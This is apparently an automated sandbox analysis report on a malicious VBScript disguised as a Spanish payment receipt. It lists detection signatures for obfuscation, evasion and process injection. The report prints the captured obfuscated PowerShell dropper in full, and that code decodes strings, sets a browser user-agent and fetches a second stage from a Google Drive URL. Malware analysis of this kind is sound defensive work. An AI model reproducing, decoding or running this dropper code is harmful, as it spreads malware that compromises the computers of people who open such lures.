Edit tour
Windows
Analysis Report
JUSTIFICANTE DE PAGO.vbs
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7296 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\JUSTI FICANTE DE PAGO.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7348 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Spiritus estes = 1; $civilisat ionen='Sub strin';$ci vilisation en+='g';Fu nction Uln age($Roadl ess){$Havn ebassinet= $Roadless. Length-$Sp irituseste s;For($Kul deblgerne= 5; $Kuldeb lgerne -lt $Havnebas sinet; $Ku ldeblgerne +=(6)){$an thracolith ic+=$Roadl ess.$civil isationen. Invoke($Ku ldeblgerne , $Spiritu sestes);}$ anthracoli thic;}func tion Multi plikatorer nes($Fngsl edes){. ($Tythed) ($Fngslede s);}$unlog ged=Ulnage '.ceanMSk alaoB silz An.oiTime blRadiolBe visaUnflu/ Broom5Caco d.Engen0Ba .dh oplsn( Bu,gaWEnli giBilspnEm iredDatafo r,mow Uni ns oilo Ka b.lNSalonT Br.kk Anac 1 lom0 Kre t. litu0Pl agi;Total Ing.aWViz. ri egalnCa rci6F,ske4 C rru;Robu s bidrax G rou6,kaer4 arve ;Ek,a m Fodfsr L untv bene: Heme,1 T,l m2m end1Ma end.Progr0 un.e)Pred r TranGPla tfeEkspacS pr skCream o tect/ St an2Vask.0 Midw1 Lecy 0Opskr0Per so1 Tilr0E ksam1etabl Ka.keFInt eri Rgelr Lucieknoer fAssobo F. rtxEleme/E sthe1Nnned 2Allia1Anm el.Frede0G alip ';$Zo otechnicia n=Ulnage ' UbrudUBerm usKo,ere,k iderBusti- TramAamit igGgerdeWe aponBe,tmt Conv ';$Bl ikdaases93 =Ulnage ' .etrh nect tGrimitKas hipJustssS nerp:Manaf / udbl/i d dadfarverI nkasiDegor v,xploeM,s ra..kyftgC apo oFanto oGuigngA.t ralBlk peA ller..ntra c Subdo Ch a mElpid/E lenduTailo crek.m?cen sueContexF emetpVebog oBill.rCha stt Form=A symmd Fun. oMikrowtra nsnVirtulF orstoFolia a Syklda a ly& Railia bri dTilfa =Overf1 Po lykcozenXG reteT ndem NPr.staRot ato EftexD oeglL Sekl JHypotpBru skhWoodbfR etracS.ind A Sa.mV Ch ucSO.ymplD ataeYDise. x Nyt.VPer sooUdloelI n.erDOv.rs 7,alelHEnl eauUndubHE nleah Buks KBimleCala rmJForv.XV idsy ';$Ti mbalernes= Ulnage 'Pa ,ie> Read ';$Tythed= Ulnage ' v ermist,tse t,lsjxTyde . ';$Conid ium='Histo ricize';Mu ltiplikato rernes (Ul nage 'P,ps iSVlteneSl nggtMeteo- Filr C Wil oKlaptn L ym.tReinse Zincenmyli ut Fu.d He mic-SpiseP N.nraP.ro btChickh.o nde ugenTO p ev:Retab \SydafV Ru mmiPsychcR ettea .ami rStrmp.Kro .stB,bylxU pliftLed n A.rom-Bio grVCaramaT ekstlSer,i uPelseeDin gt Dy de$R ulleCMa er o SeminImp liiRampidl etpai Gn.d u spanmV.j to;.nher ' );Multipli katorernes (Ulnage ' hizaiU sk ifunme, tw elv(Est at Dekoe ngo dsSjlert m icr-Tomatp engjaaTing etCharthBu sre AakanT Baloc:Bogh y\LandzVFu meriPremoc Ko,sasitc or,alsa.Sw otttAftgtx Casit Dep o)Forbr{D. mpveGeorgx Neuroi Esc atRest.}Be rmm;Ptsa, ');$Germin d = Ulnage 'Cledge S watcSwingh Strao.del i Trin%Bac ksa PincpK lamppBelbs dKvadraRef let Mi maV olut%Sqush \De,erSG m mioForetmA mplieArche sBol,gtRem sehMicr.eF ejl sIncon iSpiriaBor os.M,resST ,nerkTypis eOd.rl Pel la&Ti sm& Hall Be pe e N.ttcSaw bohNontioD epre Fraso